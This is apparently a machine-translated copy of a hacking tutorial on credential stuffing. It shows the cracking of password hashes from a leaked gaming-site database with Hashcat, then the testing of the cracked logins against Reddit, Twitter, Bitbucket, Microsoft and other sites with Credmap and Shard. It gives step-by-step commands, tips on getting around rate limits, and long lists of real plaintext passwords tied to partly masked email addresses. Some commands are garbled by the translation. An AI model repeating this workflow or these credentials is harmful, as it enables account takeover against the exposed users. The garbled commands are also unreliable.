قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit, and Microsoft) «Null Bytes :: WonderHowTo

How to Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit, and Microsoft) «Null Bytes :: WonderHowTo



Leaky databases are spread on the Internet and nobody seems to notice. We are insensitive to data breaches that occur on a daily basis because it occurs so frequently. Join me as I explain why repurposing passwords across multiple websites is a truly horrible practice – compromising hundreds of social media accounts.

LastPass published a recent poll:

More than 53% of respondents said they did not change their passwords in the last 12 months … despite the news of a password-compromised data breach [19659004] People are simply not interested in better protecting their online identities and underestimating their value to hackers. I became curious (realistic) about knowing how many online accounts an attacker would be able to compromise a single data breach, so I started searching the open internet for leaked databases.

Step 1
: Selecting the Candidate

When I decided to take a break from my examination and wanted a current record that would allow a close understanding of how far an attacker could come. I chose a small gaming website that had a data breach in 2017 and leaked its entire SQL database. In order to protect the users and their identity, I will neither name the website nor disclose any of the email addresses in the leak.

The record consisted of approximately 1,100 unique emails, usernames, hashed passwords, salts, and user IP addresses separated by colons in the following format:

  Email Username: hashed_password: salt: ip_address 

Step 2: Cracking the Hashes

Password hashing serves as a one-way function: a simple operation that makes attackers difficult to undo. It is a type of encryption that converts readable information (plain text passwords) into encrypted data (hashes). Essentially, that meant decrypting the hash strings to learn each user's password with the infamous hash cracking tool, Hashcat.

Created by Jens "atom" Steep, Hashcat is the self-proclaimed fastest and most advanced password recovery program in the world. Hashcat currently supports more than 200 highly-optimized hashing algorithms such as NetNTLMv2, LastPass, WPA / WPA2, and vBulletin, the algorithm my chosen game dataset uses. Unlike Aircrack-ng and John the Ripper, Hashcat supports GPU-based password attacks that are exponentially faster than CPU-based attacks.

Step 3: Brute force attacks in focus

Many zero byte repeat customers would probably have tried to crack a WPA2 handshake in recent years. To give readers an idea of ​​how much faster GPU-based brute-force attacks are compared to CPU-based attacks, below is an Aircracking ng benchmark ( -S ) against WPA2 keys with an Intel i7 CPU found in most modern laptops.

  aircrack-ng -S

8560 k / s 

That's 8,560 WPA2 password attempts per second. For someone unfamiliar with brute-force attacks, that seems to be a lot. But here's a Hashcat benchmark ( -b ) against WPA2 hashes ( -m 2500 ) with a simple AMD GPU:

  hashcat -b -m 2500

Hashcat (v4.1.0) starts in benchmark mode ...

Hash mode: 2500 - WPA / WPA2 (iterations: 4096)

Speed.Dev. # 1 .....: 155.6 kH / s (417.48 ms) @ Accel: 128 Loops: 256 Thr: 256 Vec: 1 

The equivalent of 155.6 kH / s is 155,600 password attempts per second. Imagine that 18 Intel i7 CPUs brute-force the same hash at the same time – so fast can a GPU be.

Not all encryption and hashing algorithms offer the same level of protection. In fact, most offer very poor protection against such brute force attacks. After discovering the record of 1,100 hash passwords with vBulletin, a popular forum platform, I ran the Hashcat benchmark again with the corresponding ( m 2711 ) hashmode:

  hashcat -b -m 2711

Hashcat (v4.1.0) starts in benchmark mode ...

Hash mode: 2711 - vBulletin> = v3.8.5

Speed.Dev. # 1 .....: 1949.6 MH / s (274.43 ms) @ Accel: 128 Loops: 512 Thr: 256 Vec: 1 

That's an estimated 1,949,600,000 (~ 2 billion) password attempts per second. Hopefully this illustrates how easy it is for anyone with a modern GPU to crack hashes after a database has leaked out.

Step 4: Brute-Forcing the Hashes

There were quite a few unnecessary data dumps in raw SQL, such as user e-mail and IP addresses. The hash passwords and salts have been filtered out in the following format.

  hashed_password: salt 

The hash passwords were then entered in Hashcat with the following command:

  hashcat -a 0 -m 2711 ~ / leaks / hashes /dataset.hashes ~ / wordlists / wordlist.txt - w 4 --potfile path ~ / pots / Dataset.potfile 

The dictionary attack or "straight mode" is using the -a 0 argument. To improve Hashcat's overall performance, I set the -w (or workload profile) to 4 to maximize cracking speed. Finally, the argument – Potfile Path was used to store the cracked hashes in the specified file.

After testing dozens of wordlists with hundreds of millions of passwords against the record, I was able to crack about 330 (30%) of the 1,100 hashes in less than an hour. Still a little unsatisfied, I tried more of Hashcat's brute-forcing features:

  Hashcat -a 3 -m 2711 ~ / leaks / hashes / dataset.hashes? L? L? L? L? L? D? D -w 4 --potfile-path ~ / pots / dataset.potfile 

Here I use Hashcats Mask attack ( -a 3 ) and try every possible six-digit lowercase letter (? L ) word ends with a two-digit number (? D ). This attempt was also completed in a relatively short time and over 100 more hashes cracked, which increased the total number of cracked hashes to exactly 475, about 43% of the 1,100 record.

After rejoining the cracked hashes with their corresponding email address I had 475 lines of the following record left.

  ****** @ web.de:Sodium60
****** @ phaphach.com:Xi@oxiao123
***** @ hotmail.nl:rockybalboa
******** @ gmail.com:ariel420
******* @ HOTMAIL.COM:SLOANE01
****** @ paul198112.plus.com: creative
******* @ hotmail.com:67thdtR8nP
****** @ gmail.com: bullets
***** @ terra.com.mx:590416
****** @ gmail.com:juan930122
******* @ aol.de:Madison1990
****** @ verizon.net:entropy33
***** @ gmail.com: flyboy21
******* @ gmail.com:rat7
******** @ jacks.sdstate.edu:entern0w
****** @ gmail.com: pookieg
****** @ hotmail.com:kevlar11
******* @ myactv.net:1oldman1
****** @ hotmail.com:Dodgers
******** @ mail.ru:wodI14z2eF
******* @ yahoo.de:bella1811
***** @ gmail.com:jojo82
***** @ hotmail.com: Metal fire
******* @ gmail.com: nonoobs810
****** @ gmail.com:bobby10
******* @ gmail.com:5Zurt8q8tQ

Step 5: Verification of password reuse

As previously mentioned, this record was published by a small, unknown gaming website. Selling these game accounts would be of little value to a hacker. The value indicates how many times users have reused their username, email address, and password on other popular sites.

To find out, Credmap and Shard were used to automate password reuse detection. These tools are quite similar, but I chose to describe them both because their results were different in different ways and are described later in this article.

Option 1: Using Credmap

Credmap is a Python script and does not require dependencies. Just clone the GitHub repository and go to the credmap / directory to use it.

  git clone https://github.com/lightos/credmap
cd credmap 

The argument can be used to display the sites that Credmap currently supports.

 . / Credmap.py --list

, .IIIII .II
I123456IIII. II. II. IIIIIIIIIIIIIIIIIIIIII
, .IIIIIIIIIIIIIIIIIIIIIIIIII.
.IIIII.III I IIIIIIIIIIIIIIIIIIIIIII
.IILOVEII II .IIIII IIIIIIIIIIII. I
III III III I IISECRETIIIIIII I
.II IIIIIIIIIIIIIIIIIIIIIIIIIII
I.IIIABC123IIII I II I
IIII IIIIIIIIIIII. I
IIIII. IIIIII. I.
IIGIIIIII IIIII ..I II.
IIIIII IIII ... IIII
IIII III. I IISEXII
III I I III
II. Me.
I

credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.de
- twitter.com
- amazon.de
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.de
- imgur.com
- foursquare.com
- pinterest.de
- instagram.com
- tract.tv
- yelp.com
- github.com
- pastebin.de
- facebook.com
- reddit.com
- zoho.de
- vimeo.com 

The argument – load allows the format "username: password". Credmap also supports the "username | email: password" format for websites that only allow signing up with an email address. This can be done with the argument – "u | e: p"

  ./crypmap.py --load ~ / leaks / cracked / dataset_user_email_pass_combos.txt --format "u | e: p" - -exclude "groupon.com, instagram.com" 

During my tests, I found that both Groupon and Instagram blocked or blacklisted my IP's IP address after several minutes of using Credmap. This is undoubtedly a result of dozens of failed attempts over a period of several minutes. I've decided to leave these sites out ( – exclude ), but a motivated attacker could find easy ways to manipulate their IP address based on a password attempt and limit their requests to circumvent the visibility of a site password-rate attacks.

The results of the Credmap command were surprising:

  [username:9v6Zyl1heT] on "Bitbucket" ...
[username:allus82] on "Reddit" ...
[username:Jesus4ever] on "Reddit" ...
[username:Jesus4ever] on "Bitbucket" ...
[username:s4mb4lb1J] to "Bitbucket" ...
[username:xjsv12] on "Bitbucket" ...
[username:rosied] on "Bitbucket" ...
[username:xbox360] on "Microsoft Live Account" ...
[username:seventeen17] on "Bitbucket" ...
[username:starwars] on "Scribd" ...
[username:Presario123] on "Bitbucket" ...
[username:podpod] on "Bitbucket" ...
[username:podpod] on "Microsoft Live Account" ...
[username:for795] on "Bitbucket" ...
[username:isbandia] on "Wikipedia" ...
[username:isbandia] on "Bitbucket" ...
[username:wtEq5n22aH] on "Scribd" ...
[username:240sxse] on "Reddit" ...
[username:warhammer40k5] on "Bitbucket" ...
[username:abeeagle] to "Reddit" ...
[username:99bottles] on "Reddit" ...
[username:99bottles] on "Wunderlist" ...
[username:99bottles] on "Microsoft Live Account" ...
[username:Checkers12] on "Reddit" ...
[username:Checkers12] on "Bitbucket" ...
[username:morgan13] on "Pinterest" ...
[username:greencar.] on "Microsoft Live Account" ...
[username:Warzone1] on "Bitbucket" ...
[username:o83bjJ1rzQ] on "Bitbucket" ...
[username:kajfarik] on "Foursquare" ...
[username:kajfarik] on "Bitbucket" ...
[username:1324Michael1324] to "Reddit" ...
[username:max1mili0n] on "Microsoft Live Account" ...
[username:s8elpz7c] on "Microsoft Live Account" ...
[username:hitman] to "Reddit" ...
[username:u9Q98rtikC] on "Bitbucket" ...
[username:ab1g0r] on "Bitbucket" ...
[username:stingray951] on "Bitbucket" ...
[username:tard] on "Bitbucket" ...
[username:Pumpkin007] on "Bitbucket" ...
[username:h8802123] on "Reddit" ...
[username:ownership1] on "Bitbucket" ...
[username:N289wewtzF] to "Bitbucket" ...
[username:Hummer1234] to "Bitbucket" ...
[username:igniter123] on "Reddit" ...
[username:167706] on "Bitbucket" ...
[username:12341234] about "Bitbucket" ...
[username:sniper] on "Bitbucket" ...
[username:1212111] on "Bitbucket" ...
[username:element1] on "Bitbucket" ...
[username:mrb1087410] on "Bitbucket" ...
[username:3k3f6wJxnK] on "Bitbucket" ...
[username:spy929] on "Bitbucket" ...
[username:qy913zdXpN] on "Bitbucket" ...
[username:E5jnhui83D] to "Bitbucket" ...
[username:6qfu6oeI8V] on "Bitbucket" ...
[username:Nd9nw88grB] on "Scribd" ...
[username:REGan181] on "Bitbucket" ...
[username:skuli2779] on "Scribd" ...
[username:phalanx1] on "Foursquare" ...
[username:ariel420] on "Microsoft Live Account" ...
[username:SLOANE01] on "Bitbucket" ...
[username:67thdtR8nP] on "Scribd" ...
[username:bullets] on "Bitbucket" ...
[username:flyboy21] on "Wunderlist" ...
[username:pookieg] on "Reddit" ...
[username:bella1811] on "Reddit" ...
[username:jojo82] on "Foursquare" ...
[username:nonoobs810] on "Microsoft Live Account" ...
[username:maxima1231] on "Reddit" ...
[username:maxima1231] on "Pinterest" ...
[username:ai7o8Z8vxO] on "Scribd" ...
[username:mustang1] on "Reddit" ...
[username:M.ustang9939] on "Bitbucket" ...
[username:Balingwenwen123] on "Bitbucket" ...
[username:dragao] on "Bitbucket" ...
[username:7egixeO38Q] on "Scribd" ...
[username:astonm] on "Bitbucket" ...
[username:Nascar2405] on "Foursquare" ...
[username:Nascar2405] on "Microsoft Live Account" ...
[username:carrie0530] on "Reddit" ...
[username:F85wdvq3kX] about "Bitbucket" ...
[username:A2w9taks7L] on "Scribd" ...
[username:A2w9taks7L] to "Linkedin" ...
[username:Hxopz542] about "Reddit" ...
[username:hd070800] on "Pinterest" ...
[username:hd070800] on "Bitbucket" ...
[username:piper1956] on "Bitbucket" ...
[username:123123qweqwe] on "Reddit" ...
[username:xboxlive] on "Reddit" ...
[username:xboxlive] on "Pinterest" ...
[username:Xi%40oxiao123] on "Bitbucket" ...
[username:metallica12] on "Bitbucket" ...
[username:sianlaser12] on "Pinterest" ...
[username:h8ep81knFR] on "Reddit" ...
[username:plummer92] on "Reddit" ...
[username:plummer92] on "Bitbucket" ...
[username:8246jt] on "Reddit" ...
[username:8246jt] on "Scribd" ...
[username:271bEzxonZ] on "Bitbucket" ...
[username:6911747] on "Scribd" ...
[username:6911747] on "Bitbucket" ...
[username:raejas11] on "Bitbucket" ...
[username:d0bb3lts4lt0] on "Microsoft Live Account" ...
[username:2yvpdl13CP] on "Scribd" ...
[username:dodgers123] on "Bitbucket" ...
[username:urbanus] on "Reddit" ...
[username:0506571670] on "Foursquare" ...
[username:gyqK8Giz1P] on "Bitbucket" ...
[username:e6bnvVo67H] on "Bitbucket" ...
[username:92k2cizCdP] on "Scribd" ...
[username:drnCy43g4O] on "Reddit" ...
[username:Ayrtonsenna1] on "Bitbucket" ...
[username:aerielle] on "Microsoft Live Account" ...
[username:12341234a] on "Reddit" ...
[username:6Ibit6qp1F] on "Bitbucket" ...
[username:5n6xcd6rPD] on "Scribd" ...
[username:5n6xcd6rPD] on "Bitbucket" ...
[username:Redalert1] on "Bitbucket" ...
[username:2689874] on "Scribd" ...
[username:2689874] on "Pinterest" ...
[username:bma81092] on "Reddit" ...
[username:bma81092] about "Bitbucket" ...
[username:csibi2007] on "Reddit" ...
[username:alterego] on "Bitbucket" ...
[username:tournament] on "Bitbucket" ...
[username:Lena2020] on "Pinterest" ...
[username:Lena2020] on "Bitbucket" ...
[username:alejandro] on "Scribd" ...
[username:alejandro] on "Bitbucket" ...
[username:Imtr0uble] on "Bitbucket" ...
[username:sucette] on "Bitbucket" ...
[username:pipQc5p24Q] on "Bitbucket" ...
[username:moomoo] on "Pinterest" ...
[username:N0t3p%40D%21] on "Scribd" ...
[username:N0t3p%40D%21] on "Pinterest" ...
[username:7bR9bft8cQ] on "Bitbucket" ...
[username:puzzle] on "Bitbucket" ...
[username:spartan117] on "Microsoft Live Account" ...
[username:scooby1621] on "Microsoft Live Account" ...
[username:mike1828] on "Microsoft Live Account" ...
[username:fifer123] on "Microsoft Live Account" ...
[username:e5Bo1fx3kF] on "Scribd" ...
[username:monkey] on "Reddit" ...
[username:darkstar] on "Bitbucket" ...
[username:irzF9k6p1H] on "Reddit" ...
[username:8yu9hkwV9Q] on "Scribd" ...
[username:c0mmand] on "Bitbucket" ...
[username:doppler] on "Reddit" ...
[username:doppler] on "Scribd" ...
[username:jh5thrwgefsdfs] on "Bitbucket" ...
[username:roblox12] about "Bitbucket" ...
[username:aqwzsxedc] on "Bitbucket" ...
[username:12345tessi] on "Bitbucket" ...
[username:helmond] on "Bitbucket" ...
[username:Liam1123] about "Reddit" ...
[username:liptoo98] on "Scribd" ...
[username:b82olSn4yH] on "Bitbucket" ...
[username:bossos2] on "Microsoft Live Account" ...
[username:highjump] on "Bitbucket" ...
[username:juhu1230] on "Reddit" ...
[username:bepolite] on "Reddit" ...
[username:M00nglum] on "Microsoft Live Account" ...
[username:Adw2u1h3tO] on "Bitbucket" ...
[username:Manly123] on "Bitbucket" ...
[username:ragnarok01] on "Reddit" ...
[username:useless] on "Pinterest" ...
[username:starwars97] to "Reddit" ...
[username:doodle] about "Bitbucket" ...
[username:TYzt2013] on "Bitbucket" ...
[username:Cheese77] on "Microsoft Live Account" ...
[username:voxpi384] about "Bitbucket" ...
[username:allah4life] on "Reddit" ...
[username:allah4life] on "Wunderlist" ...
[username:Jackal67] to "Reddit" ...
[username:Jackal67] on "Bitbucket" ...
[username:jasmine00] on "Bitbucket" ...
[username:LXfn3BG952] about "Reddit" ...
[username:alfiedog12] on "Pinterest" ...
[username:25262928] on "Reddit" ...
[username:25262928] on "Bitbucket" ...
[username:Rat_isthebest] on "Foursquare" ...
[username:Rat_isthebest] on "Scribd" ...
[username:Rat_isthebest] on "Bitbucket" ...
[username:Rat_isthebest] on "Wunderlist" ...
[username:4kg83zRltG] on "Scribd" ...
[username:4kg83zRltG] on "Bitbucket" ...
[username:f1scher] about "Reddit" ...
[username:o23jwr8uFD] to "Reddit" ...
[username:o23jwr8uFD] on "Bitbucket" ...
[username:ikbengek1] on "Pinterest" ...
[username:Trustno1%21] on "Bitbucket" ...
[username:trudat] about "Bitbucket" ...
[username:tototomy] on "Bitbucket" ...
[username:qwer1234] on "Bitbucket" ...
[username:1391730] on "Foursquare" ...
[username:robby123] on "Scribd" ...
[username:actsman7] about "Bitbucket" ...
[username:whodey] on "Wunderlist" ...
[username:308184rt] on "Reddit" ...
[username:108Resistance] on "Bitbucket" ...
[username:yilin9409] on "Scribd" ...
[username:joshuavi] to "Reddit" ...
[username:damnkids] on "Bitbucket" ...
[username:jbncde5hn6y5] on "Bitbucket" ...
[username:roblox12] on "Reddit" ...
[username:roblox12] about "Bitbucket" ...
[username:azerty00] on "Reddit" ...
[username:azerty00] on "Pinterest" ...
[username:gymkhana] on "Bitbucket" ...
[username:gymkhana] on "Wunderlist" ...
[username:newgame] on "Reddit" ...
[username:dacheng198] on "Scribd" ...
[username:123456] on "Bitbucket" ...
[username:syndrom02] on "Reddit" ...
[username:Paintball1] on "Bitbucket" ...
[username:4536729] on "Bitbucket" ...
[username:rawtheme22] to "Reddit" ...
[username:rawtheme22] about "Bitbucket" ...
[username:sobaked123] on "Microsoft Live Account" ...
[username:Thee1234] on "Bitbucket" ...
[username:sersna7] on "Bitbucket" ...
[username:indonesia2016] on "Scribd" ...
[username:indonesia2016] to "Microsoft Live Account" ...
[username:Ou6tlgr87N] on "Scribd" ...
[username:sea2shell] on "Reddit" ...
[username:01cs653] on "Reddit" ...
[username:73icJf3ilZ] on "Scribd" ...
[username:ndyr761pGO] on "Bitbucket" ...
[username:prosk8ter] on "Bitbucket" ...
[username:games%21%21%21] on "Pinterest" ...
[username:games%21%21%21] on "Microsoft Live Account" ...
[username:gt9800] to "Bitbucket" ...
[username:mel4tipp] on "Microsoft Live Account" ...
[username:mvp123] on "Reddit" ...
[username:mvp123] on "Bitbucket" ...
[username:3g82tafLbY] on "Bitbucket" ...
[username:arturi09] on "Wunderlist" ...
[username:arturi09] on "Microsoft Live Account" ...
[username:092486] on "Bitbucket" ...
[username:sappeps12345] on "Reddit" ...
[username:1morerep] on "Bitbucket" ...
[username:Finalfantasy89] on "Reddit" ...
[username:Finalfantasy89] on "Bitbucket" ...
[username:11%3D11bts] on "Scribd" ... 

All usernames have been edited, but we can see that 246 Reddit, Microsoft, Foursquare, Wunderlist, and Scribd accounts had the same username and password combinations as the small one Gaming Website Dataset

Option 2: Using Shard

Shard requires Java, which by default does not need to be present in Kali, and can be installed with the following command:

  sudo apt-get install default -jre 

Then download the latest version of Shard with the command wget .

  wget # https: //github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar 

As with Credmap, the argument can be used with Shard to view the supported sites.

  java -jar shard-1.5.jar --list

[+] Available modules:
[+] Facebook
[+] LinkedIn
[+] Reddit
[+] Twitter
[+] Instagram
[+] GitHub
[+] BitBucket
[+] Kijiji
[+] DigitalOcean
[+] Vimeo
[+] Laposte
[+] Dailymotion 

Using Shard requires only the argument – file to begin detecting password reuse.

  java -jar shard-1.5.jar --file ~ / leaks / cracked / dataset_user_email_pass_combos. txt

[+] Execution in multi-user multi-password mode
[+] Parsing 475 credentials
[+] 11 modules are running
[+] ******* @ mail.ru:9v6Zyl1heT - Twitter
[+] ******* @ mail.ru:y2v7nG3oeJ - BitBucket
[+] ******* @ hotmail.com:5Zurt8q8tQ - BitBucket
[+] ******* @ yandex.com:gD82guh6iS - BitBucket
[+] ******* @ hotmail.com:jellybaby - BitBucket
[+] ******* @ gmail.com: actsman7 - Twitter, BitBucket
[+] ******* @ gmail.com:eternity1 - BitBucket
[+] ******* @ gmail.com: joker7 - BitBucket
[+] ******* @ aol.com:xbox360 - BitBucket
[+] ******* @ gmail.com:pie110016678 - BitBucket
[+] ******* @ live.com:roblox12 - BitBucket
[+] ******* @ gmail.com:andre0 - BitBucket
[+] ******* @ qq.com:123456 - BitBucket
[+] ******* @ hotmail.com:hellomotto - BitBucket
[+] ******* @ outlook.com:Cromador - BitBucket
[+] ******* @ hotmail.co.uk:ibanez92 - Twitter
[+] ******* @ hotmail.com: Presario123 - Twitter
[+] ******* @ op.pl:isbandia - BitBucket
[+] ******* @ gmail.com:240sxse - BitBucket
[+] ******* @ gmail.com:99bottles - Twitter
[+] ******* @ gmail.com:Checkers12 - Twitter, BitBucket
[+] ******* @ yahoo.com:Speckles - BitBucket
[+] ******* @ aol.fr:o83bjJ1rzQ - BitBucket
[+] ******* @ michaelbodach.com:1324Michael1324 - BitBucket
[+] ******* @ gmail.com: drhs2012 - Twitter
[+] ******* @ btinternet.com:max1mili0n - Facebook, BitBucket
[+] ******* @ gmail.com: s8elpz7c - Twitter
[+] ******* @ yahoo.com: hitman - Twitter
[+] ******* @ mail.ru:e6bnvVo67H - BitBucket
[+] ******* @ gmail.com:ab1g0r - BitBucket
[+] ******* @ gmail.com: snickers7 - BitBucket
[+] ******* @ gmail.com:1949qweA - BitBucket
[+] ******* @ live.se:stingray951 - Twitter, BitBucket
[+] ******* @ outlook.com:Pumpkin007 - Facebook
[+] ******* @ yahoo.com: baseball11 - Twitter
[+] ******* @ hotmail.com:h8802123 - BitBucket
[+] ******* @ mail.ru:i7q8c8jDkW - BitBucket
[+] ******* @ gmail.com: Hummer1234 - BitBucket
[+] ******* @ hotmail.com:50killer - BitBucket, Kijiji
[+] ******* @ gmail.com:igniter123 - BitBucket
[+] ******* @ hotmail.se:joker123 - BitBucket
[+] ******* @ gmail.com: orlando.12 - BitBucket
[+] ******* @ gmail.com:167706 - Twitter
[+] ******* @ hotmail.com:pssp643056 - Twitter
[+] ******* @ gmail.com: tacotico - Twitter, BitBucket
[+] ******* @ Hotmail.com:12341234 - Twitter
[+] ******* @ comcast.net:1212111 - BitBucket
[+] ******* @ mail.ru:2hg5hd4uEE - BitBucket
[+] ******* @ yahoo.com:element1 - BitBucket
[+] ******* @ msn.com:trooper71 - Facebook, Twitter
[+] ******* @ gmail.com:Mustang7991 - BitBucket
[+] ******* @ gmail.com: fuckthat - BitBucket
[+] ******* @ gmail.com: qy913zdXpN - BitBucket
[+] ******* @ hotmail.com:vdz3888 - BitBucket
[+] ******* @ rogers.com:maplew00d - Facebook
[+] ******* @ hotmail.com:Nd9nw88grB - BitBucket
[+] ******* @ msn.com:1234567890 - BitBucket
[+] ******* @ yahoo.com: p00p00p00 - Twitter, BitBucket
[+] ******* @ HOTMAIL.COM:SLOANE01 - BitBucket
[+] ******* @ paul198112.plus.com:creative - BitBucket
[+] ******* @ terra.com.mx:590416 - BitBucket
[+] ******* @ gmail.com: juan930122 - Facebook, Twitter, BitBucket
[+] ******* @ aol.de:Madison1990 - BitBucket
[+] ******* @ verizon.net:entropy33 - BitBucket
[+] ******* @ gmail.com:rat7 - BitBucket
[+] ******* @ jacks.sdstate.edu:enten0w - BitBucket
[+] ******* @ hotmail.com:kevlar11 - BitBucket
[+] ******* @ hotmail.com:Dodgers - BitBucket
[+] ******* @ mail.ru:wodI14z2eF - BitBucket
[+] ******* @ gmail.com: Jojo82 - BitBucket
[+] ******* @ gmail.com:maxima1231 - Facebook, BitBucket
[+] ******* @ yahoo.com:mustang1 - BitBucket
[+] ******* @ gmail.com:M.ustang9939 - Twitter, BitBucket
[+] ******* @ gmail.com: ROFLMAO - BitBucket
[+] ******* @ gmail.com: qwerty - BitBucket
[+] ******* @ gmail.com:skatebrd1 - Twitter
[+] ******* @ gmail.com:carrie0530 - BitBucket
[+] ******* @ gmail.com: Hxopz542 - Twitter, BitBucket
[+] ******* @ gmail.com:hd070800 - Facebook
[+] ******* @ yahoo.com: xboxlive - BitBucket
[+] ******* @ gmail.com: sianlaser12 - BitBucket
[+] ******* @ live.co.uk:newworldorder11 - Facebook, Twitter
[+] ******* @ mail.ru:t57yuuD2nH - BitBucket
[+] ******* @ mail.ru:h8ep81knFR - Twitter, BitBucket
[+] ******* @ msn.com:Legion01 - Twitter
[+] ******* @ gmail.com: Vapor1948 - BitBucket
[+] ******* @ hotmail.com:Kerri14 - BitBucket
[+] ******* @ mail.ru:271bEzxonZ - BitBucket
[+] ******* @ gmail.com: Raejas11 - Twitter
[+] ******* @ hotmail.com:2yvpdl13CP - BitBucket
[+] ******* @ mail.ru:x52Wugvl3D - BitBucket
[+] ******* @ hotmail.com:bcd234 - BitBucket
[+] ******* @ hotmail.com:dodgers123 - BitBucket
[+] ******* @ centurylink.net:zaq11qaz - BitBucket
[+] ******* @ hotmail.com:stumpy69 - BitBucket
[+] ******* @ gmail.com: 506571670 - Twitter, BitBucket
[+] ******* @ ewjc.com:fr33ze - BitBucket
[+] ******* @ gmail.com: gyqK8Giz1P - BitBucket
[+] ******* @ gmail.com: abc12345 - BitBucket
[+] ******* @ hotmail.com:92k2cizCdP - BitBucket
[+] ******* @ gmail.com:123456 - BitBucket
[+] ******* @ yandex.com:drnCy43g4O - Twitter
[+] ******* @ gmail.com:makocole1 - Twitter, Kijiji
[+] ******* @ gmail.com: Ayrtonsenna1 - Facebook
[+] ******* @ gmail.com: sixsixsix - BitBucket
[+] ******* @ aol.com:aerielle - BitBucket
[+] ******* @ yahoo.com:12341234a - Twitter
[+] ******* @ gmail.com:6Ibit6qp1F - BitBucket
[+] ******* @ gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] ******* @ gmail.com: bma81092 - Twitter, BitBucket
[+] ******* @ hotmail.com: Tournament - BitBucket
[+] ******* @ hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] ******* @ yahoo.com:600543jp - BitBucket
[+] ******* @ blueyonder.co.uk:simpkins - BitBucket
[+] ******* @ gmail.com:linkin2632 - Twitter
[+] ******* @ yahoo.com:c572889 - Twitter
[+] ******* @ yahoo.com.mx:alejandro - BitBucket
[+] ******* @ gmail.com: conconabab - BitBucket
[+] ******* @ free.fr:sucette - BitBucket
[+] ******* @ hotmail.com:pipQc5p24Q - BitBucket
[+] ******* @ h4milton.com:pepper10 - BitBucket
[+] ******* @ gmail.com: Cheese24 - BitBucket
[+] ******* @ gmail.com: willow76! - Facebook, Kijiji
[+] ******* @ live.ca:shawn2000 - Twitter, BitBucket
[+] ******* @ gmail.com:spartan117 - Twitter, BitBucket
[+] ******* @ hotmail.com:fifa2007 - Twitter
[+] ******* @ yahoo.com:mike1828 - BitBucket
[+] ******* @ live.com:Bounce989 - Twitter, BitBucket
[+] ******* @ gmail.com:13241324 - Twitter
[+] ******* @ mail.ru:e5Bo1fx3kF - BitBucket
[+] ******* @ mail.ru:1doc2H5wxZ - BitBucket
[+] ******* @ mail.ru:irzF9k6p1H - Twitter
[+] ******* @ gmail.com: robox12 - Facebook, Twitter
[+] ******* @ hotmail.com: Helmond - BitBucket
[+] ******* @ gmail.com: Liam1123 - BitBucket
[+] ******* @ yahoo.com: be6315se - Twitter
[+] ******* @ hotmail.com:r1s2d3nt - BitBucket
[+] ******* @ hotmail.com:rock18 - BitBucket
[+] ******* @ gmail.com: bossos2 - BitBucket
[+] ******* @ gmail.com:highjump - BitBucket
[+] ******* @ googlemail.com:juhu1230 - BitBucket
[+] ******* @ charter.net:amanda11 - BitBucket
[+] ******* @ gmail.com: Adw2u1h3tO - BitBucket
[+] ******* @ hotmail.com:ragnarok01 - Twitter
[+] ******* @ hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] ******* @ gmail.com: Games123 - Twitter
[+] ******* @ hotmail.com:good4u - Kijiji
[+] ******* @ hotmail.com:2211 - BitBucket
[+] ******* @ gmail.com: Starwars97 - BitBucket
[+] ******* @ aol.com:hardass - BitBucket
[+] ******* @ gmail.com:scarface - BitBucket
[+] ******* @ t-online.de:143ABC1 - BitBucket
[+] ******* @ gmail.com:weswee234 - Twitter
[+] ******* @ hotmail.com: javiermago1 - BitBucket
[+] ******* @ yahoo.com: w1a2y3n4e5 - BitBucket
[+] ******* @ gmail.com:608881e - Kijiji
[+] ******* @ yahoo.com:74langley - BitBucket
[+] ******* @ hotmail.com: bosspimp - Facebook, Twitter
[+] ******* @ gmail.com:Driftking1 - Twitter
[+] ******* @ hotmail.com: voxpi384 - BitBucket
[+] ******* @ gmail.com:allah4life - BitBucket
[+] ******* @ comcast.net:Jackal67 - BitBucket
[+] ******* @ hotmail.com:jasmine00 - Facebook, BitBucket
[+] ******* @ gmail.com:10241966 - BitBucket
[+] ******* @ gmail.com:alfiedog12 - BitBucket
[+] ******* @ gmail.com:olivia1 - BitBucket
[+] ******* @ gmail.com: Rat_isthebest - Kijiji
[+] ******* @ web.de:scoop - BitBucket
[+] ******* @ hotmail.com:ikbengek1 - Twitter, BitBucket
[+] ******* @ allansmith.net:ras04cal - Twitter
[+] ******* @ 419.e90.biz:b82olSn4yH - BitBucket
[+] ******* @ hotmail.com: Tototomy - Twitter
[+] ******* @ gmail.com:2211 - BitBucket
[+] ******* @ qq.com:1391730 - Twitter
[+] ******* @ gmail.com:robby123 - BitBucket
[+] ******* @ gmail.com:Logitech123 - BitBucket
[+] ******* @ yahoo.com:darkstar3509 - BitBucket
[+] ******* @ gmail.com:whodey - BitBucket
[+] ******* @ uhd.net.ua:h55gr5sKdQ - BitBucket
[+] ******* @ gmail.com: robox12 - BitBucket
[+] ******* @ gmail.com:12345Brandon - BitBucket
[+] ******* @ gmail.com: Banan123 - BitBucket
[+] ******* @ gmail.com: joshuavi - Kijiji
[+] ******* @ cox.net:damnkids - BitBucket
[+] ******* @ hotmail.com:1colort2 ​​- BitBucket
[+] ******* @ live.com:roblox12 - Twitter, BitBucket
[+] ******* @ gmail.com:azerty00 - Twitter
[+] ******* @ gmail.com: apache7076 - Twitter
[+] ******* @ inmyd.ru:2wbJx11zaW - BitBucket
[+] ******* @ aim.com: this isme - BitBucket
[+] ******* @ gmail.com: roofeng198 - BitBucket
[+] ******* @ GMAIL.COM: BASSETT92 - BitBucket
[+] ******* @ gmail.com:123456 - BitBucket
[+] ******* @ hotmail.com:syndrom02 - Twitter, BitBucket
[+] ******* @ gmail.com: bronco999 - BitBucket
[+] ******* @ hotmail.com:metallica4224 - Twitter
[+] ******* @ gmail.com:rawtheme22 - Twitter
[+] ******* @ gmail.com: sobaked123 - BitBucket
[+] ******* @ gmail.com: Thee1234 - BitBucket
[+] ******* @ hotmail.ca.0230176 - BitBucket
[+] ******* @ gmail.com:19722791 - BitBucket
